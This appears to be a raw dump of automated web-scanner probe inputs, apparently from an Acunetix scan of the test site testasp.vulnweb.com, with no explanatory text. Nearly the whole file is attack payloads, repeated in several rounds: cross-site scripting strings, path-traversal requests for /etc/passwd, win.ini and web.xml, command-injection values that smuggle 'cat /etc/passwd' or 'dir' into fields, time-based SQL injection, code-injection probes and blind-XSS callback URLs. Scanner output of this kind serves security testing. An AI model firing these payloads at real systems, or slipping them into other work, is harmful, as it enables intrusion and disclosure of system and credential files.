http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

[url=http://www.acunetix.com]website security[/url]

-1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

&dir

1

${@print(md5(acunetix_wvs_security_test))}\

-1)

1_OFT9M <ScRiPt >prompt(957443)</ScRiPt>

1

1

1

'&dir&'

1

1

1

1

1

1

http://hitwZeFMXe3hC.bxss.me/

-1))

"&dir&"

file:///etc/passwd

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

zlHG38kk'

|dir

1

acunetix_wvs_invalid_filename

1

http://www.acunetix.tst

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

WEB-INF/web.xml

A4TKCKLI')

comments

1

'|dir

'"

1

KmmGxPWw'))

WEB-INF\web.xml

1

1'"()&%<ScRiPt >prompt(954432)</ScRiPt>

1

comments

1

"|dir

<!--

1

../../../../../../../../../../windows/win.ini

comments/.

'"()&%<ScRiPt >prompt(919299)</ScRiPt>

1

1

1

../../../../../../../../../../boot.ini

1

1

1_989835

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acu8961\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8961

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

acux6454\xc0\xbez1\xc0\xbcz2a\x90bcxuca6454

1

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(977508)</ScRiPt>

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(924162)</script>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(934593)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?900220></ScRiPt>

1

1

1<ScRiPt >prompt(927962)</ScRiPt>

1

WEB-INF/web.xml

1

1

1<video><source onerror="javascript:prompt(949834)">

WEB-INF\web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977698)"></g></svg>

1

1

1

1<div style=width:expression(prompt(901095))>

1

1

1

1

1

1<iframe src='data:text/html

1

1

1

1

1<body onload=prompt(923074)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(943238)>

1

1

1

1<img src=xyz OnErRor=prompt(969112)>

1

1

1<img/src=">" onerror=alert(946491)>

1

1<ScRiPt%20>prompt(954089)</sCripT>

1

1&lt

1

\xf6<img acu onmouseover=prompt(914161) //\xf6>

1

1<input autofocus onfocus=prompt(978932)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

1_GptRu <ScRiPt >prompt(968108)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9260980*9487510)

1

&cat /etc/passwd&

'+response.write(9260980*9487510)+'

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

"+response.write(9260980*9487510)+"

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

${99076+100064}

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

cat /etc/passwd

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1&n964941=v913090

-1

1

../../../../../../../../../../etc/passwd.jpg

1

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

'"()

1

'

!(()&&!|*|*|

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

rK1RdfhM'

1

testasp.vulnweb.com

"|"ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1FYEtxnU')

^(#$!@#$)(()))******

"

1

http://hitCKuLCVxbtW.bxss.me/

acunetix_wvs_invalid_filename

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

4hMWtOeA'))

/etc/passwd

1

1

'

comments

-1

1

${@print(md5(acunetix_wvs_security_test))}\

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

comments

"

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://www.acunetix.tst

-1))

1

'"

1

1

comments/.

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

uw3Q6kf8'

<!--

&dir

1

1'"()&%<ScRiPt >prompt(940407)</ScRiPt>

1

1

6rCGJgf3')

file:///etc/passwd

'"()&%<ScRiPt >prompt(958372)</ScRiPt>

1

'&dir&'

1

/\../\../\../\../\../\../\../etc/passwd

cgqlHjFV'))

1

"&dir&"

1

1_983671

1

1

WEB-INF/web.xml

1

1

|dir

acu2985\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2985

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

acux8179\xc0\xbez1\xc0\xbcz2a\x90bcxuca8179

'|dir

1

1<ScRiPt >prompt(964710)</ScRiPt>

../../../../../../../../../../boot.ini

"|dir

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(932266)</script>

1

1

1<ScRiPt >prompt(985854)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?963257></ScRiPt>

................windowswin.ini

1

1

1<ScRiPt >prompt(920878)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(951153)">

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(951225)"></g></svg>

1

response.write(9323119*9558597)

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<div style=width:expression(prompt(954688))>

'+response.write(9323119*9558597)+'

1

1<iframe src='data:text/html

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

"+response.write(9323119*9558597)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

'&cat /etc/passwd&'

1<body onload=prompt(960424)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

"&cat /etc/passwd&"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(903938)>

1

WEB-INF/web.xml

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

-1

1

SomeCustomInjectedHeader:injected_by_wvs

1

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img src=xyz OnErRor=prompt(959368)>

WEB-INF\web.xml

`cat /etc/passwd`

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

${100167+99411}

|cat /etc/passwd#

1<img/src=">" onerror=alert(902720)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n997314=v957988

1

1

BOvK73J1'

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<ScRiPt%20>prompt(915409)</sCripT>

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

1

1

)

"|"ld

1

1&lt

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

v38vKOLu')

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1h7CNHHL'))

'"()

/etc/passwd

\xf6<img acu onmouseover=prompt(903076) //\xf6>

^(#$!@#$)(()))******

1

testasp.vulnweb.com

'

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<input autofocus onfocus=prompt(980427)>

1

-1

1

1

1

"

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

-1)

<a href='http://www.acunetix.com'>website security</a>

1

${@print(md5(acunetix_wvs_security_test))}

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

||cat /etc/passwd

1

-1))

[url=http://www.acunetix.com]website security[/url]

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}\

1

1

&dir

3bXORN0p'

1_pMVJu <ScRiPt >prompt(979936)</ScRiPt>

1

http://hiton4n975xy4.bxss.me/

acunetix_wvs_invalid_filename

1

1

1

1

yBPKxBdX')

file:///etc/passwd

'&dir&'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

1

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

0KLJ5bOY'))

1

1

http://www.acunetix.tst

comments

1

1

|dir

WEB-INF/web.xml

1

1'"()&%<ScRiPt >prompt(913713)</ScRiPt>

'"

1

'|dir

comments/.

1

1

WEB-INF\web.xml

"|dir

1

1

'"()&%<ScRiPt >prompt(986682)</ScRiPt>

<!--

1

../../../../../../../../../../windows/win.ini

1

1_926822

1

1

1

1

1

1

../../../../../../../../../../boot.ini

1

1

acu5708\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5708

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acux8559\xc0\xbez1\xc0\xbcz2a\x90bcxuca8559

1

1

1

1<ScRiPt >prompt(904169)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(913576)</script>

1

................windowswin.ini

1

1<ScRiPt >prompt(910194)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?988215></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(998967)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(990136)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9434587*9566892)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(910291)"></g></svg>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

'+response.write(9434587*9566892)+'

&cat /etc/passwd&

1

1<div style=width:expression(prompt(949983))>

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF/web.xml

'&cat /etc/passwd&'

"+response.write(9434587*9566892)+"

../../../../../../../../../../etc/passwd

1

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<body onload=prompt(976507)>

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

cat /etc/passwd

-1

1

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(933513)>

1

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1<img src=xyz OnErRor=prompt(923442)>

1

1

1

${99902+99568}

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img/src=">" onerror=alert(991407)>

)

1

1&n909075=v994239

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt%20>prompt(901742)</sCripT>

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

aPxOKylS'

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1&lt

"|"ld

KxKWukka')

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'"()

/etc/passwd

\xf6<img acu onmouseover=prompt(939802) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

7hTOrv0N'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

testasp.vulnweb.com

1

'

-1

'

1

1<input autofocus onfocus=prompt(958130)>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

"

1

-1)

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

http://hitEbZlzRcmaj.bxss.me/

"

1

-1))

||cat /etc/passwd

1

1

file:///etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

acunetix_wvs_invalid_filename

[url=http://www.acunetix.com]website security[/url]

1

1

&dir

1

HxQd1hN1'

${@print(md5(acunetix_wvs_security_test))}\

/\../\../\../\../\../\../\../etc/passwd

1

1_FFORU <ScRiPt >prompt(927968)</ScRiPt>

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

WEB-INF/web.xml

HH6xol02')

'&dir&'

1

http://www.acunetix.tst

1

1

comments

'"

1

WEB-INF\web.xml

2fafd2zT'))

1

1

"&dir&"

1'"()&%<ScRiPt >prompt(997845)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini

<!--

comments/.

1

|dir

1

'"()&%<ScRiPt >prompt(900900)</ScRiPt>

1

1

1

1

1

../../../../../../../../../../boot.ini

1

1_914445

'|dir

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

"|dir

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

acu5150\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5150

1

1

1

................windowswin.ini

1

acux7013\xc0\xbez1\xc0\xbcz2a\x90bcxuca7013

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(931017)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(989128)</script>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(952290)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?952183></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<ScRiPt >prompt(940881)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(969635)">

1

response.write(9707543*9431163)

1

1

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(982438)"></g></svg>

1

'+response.write(9707543*9431163)+'

WEB-INF\web.xml

1<div style=width:expression(prompt(938242))>

1

1

1

"+response.write(9707543*9431163)+"

SomeCustomInjectedHeader:injected_by_wvs

1

&cat /etc/passwd&

../../../../../../../../../../etc/passwd

1

1<iframe src='data:text/html

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'&cat /etc/passwd&'

1

1<body onload=prompt(994644)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

"&cat /etc/passwd&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(975391)>

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

1

1

-1

${99662+99240}

1<img src=xyz OnErRor=prompt(956077)>

cat /etc/passwd

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1)

`cat /etc/passwd`

1

1<img/src=">" onerror=alert(963030)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n969374=v925936

1

1

-1))

1some_inexistent_file_with_long_name%00.jpg

1

|cat /etc/passwd#

1<ScRiPt%20>prompt(924064)</sCripT>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

1

1

1&lt

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

3wqVHKyE'

'"()

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

dQoK8Cvl')

1

testasp.vulnweb.com

"|"ld

\xf6<img acu onmouseover=prompt(973828) //\xf6>

1

/etc/passwd

'

^(#$!@#$)(()))******

1

1

1<input autofocus onfocus=prompt(996426)>

1

sozWefrZ'))

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

'

1

-1

1

1

acunetix_wvs_invalid_filename

"

[url=http://www.acunetix.com]website security[/url]

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

http://hitkVbXX4K27w.bxss.me/

-1)

comments

1

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1_BXgg5 <ScRiPt >prompt(936443)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}\

&dir

1

comments

-1))

1

1

1

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

file:///etc/passwd

http://www.acunetix.tst

LGV7n7rF'

comments/.

1

1

"&dir&"

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

C0ra6lND')

1

1

'"

1'"()&%<ScRiPt >prompt(946457)</ScRiPt>

WEB-INF/web.xml

1

|dir

1

1

WEB-INF\web.xml

<!--

fvZCTFzR'))

'"()&%<ScRiPt >prompt(924089)</ScRiPt>

1

1

'|dir

1

../../../../../../../../../../windows/win.ini

1

1_982135

1

1

acu7324\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7324

../../../../../../../../../../boot.ini

1

1

"|dir

1

acux2002\xc0\xbez1\xc0\xbcz2a\x90bcxuca2002

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(939930)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(943892)</script>

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(989499)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?964345></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(926967)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(933250)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(922069)"></g></svg>

1

1

1

WEB-INF/web.xml

1

1<div style=width:expression(prompt(918300))>

1

response.write(9152372*9644791)

1

WEB-INF\web.xml

1<iframe src='data:text/html

1

1

&cat /etc/passwd&

1

'+response.write(9152372*9644791)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(945048)>

'&cat /etc/passwd&'

1

1

../../../../../../../../../../etc/passwd

"+response.write(9152372*9644791)+"

1

1

"&cat /etc/passwd&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(995071)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(946985)>

cat /etc/passwd

1

${100130+99618}

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

`cat /etc/passwd`

1

1

1<img/src=">" onerror=alert(949408)>

1

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1<ScRiPt%20>prompt(994783)</sCripT>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1&n950460=v906397

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1&lt

1

1

1

1

1some_inexistent_file_with_long_name%00.jpg

)

\xf6<img acu onmouseover=prompt(905072) //\xf6>

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

"|"ld

1

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<input autofocus onfocus=prompt(960828)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

GKSZ1UYb'

^(#$!@#$)(()))******

testasp.vulnweb.com

/etc/passwd

<a href='http://www.acunetix.com'>website security</a>

'"()

'

1

1

1

'

0wEKHhls')

1

[url=http://www.acunetix.com]website security[/url]

1

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1_846El <ScRiPt >prompt(913966)</ScRiPt>

1

HRuYRjwm'))

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

1

http://hitD3bCKqJzPG.bxss.me/

-1

acunetix_wvs_invalid_filename

1

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

-1)

&dir

comments

1

1

http://www.acunetix.tst

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

file:///etc/passwd

-1))

1

1

'&dir&'

comments

1

1

1

/\../\../\../\../\../\../\../etc/passwd

'"

1'"()&%<ScRiPt >prompt(966856)</ScRiPt>

1

idtwTWyY'

comments/.

"&dir&"

1

'"()&%<ScRiPt >prompt(947168)</ScRiPt>

1

<!--

WEB-INF/web.xml

BGr0eWF9')

1

|dir

1

1_914441

1

WEB-INF\web.xml

dmIWsMH9'))

1

1

../../../../../../../../../../windows/win.ini

1

'|dir

../../../../../../../../../../boot.ini

1

1

1

acu3623\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3623

1

"|dir

1

../../../../../../../../../../windows/win.ini.jpg

1

acux5446\xc0\xbez1\xc0\xbcz2a\x90bcxuca5446

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt >prompt(994657)</ScRiPt>

1

................windowswin.ini

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(974417)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(913357)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?934500></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<ScRiPt >prompt(932792)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(940058)">

1

1

WEB-INF/web.xml

1

1

response.write(9543027*9398403)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(929291)"></g></svg>

1

WEB-INF\web.xml

1

1

1<div style=width:expression(prompt(996409))>

'+response.write(9543027*9398403)+'

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

"+response.write(9543027*9398403)+"

1<iframe src='data:text/html

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(916307)>

1

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973417)>

1

-1

cat /etc/passwd

1

1

-1)

1

1

../../../../../../../../../../etc/passwd.jpg

1<img src=xyz OnErRor=prompt(974357)>

1

1

`cat /etc/passwd`

${99810+100069}

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n911513=v913054

1

1<img/src=">" onerror=alert(990379)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1

yEHSpzmA'

1

1

1some_inexistent_file_with_long_name%00.jpg

1

)

1

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(958428)</sCripT>

ZhKzh37l')

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1&lt

ZejwXV3Z'))

'"()

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

1

'

testasp.vulnweb.com

1

^(#$!@#$)(()))******

-1

\xf6<img acu onmouseover=prompt(901598) //\xf6>

1

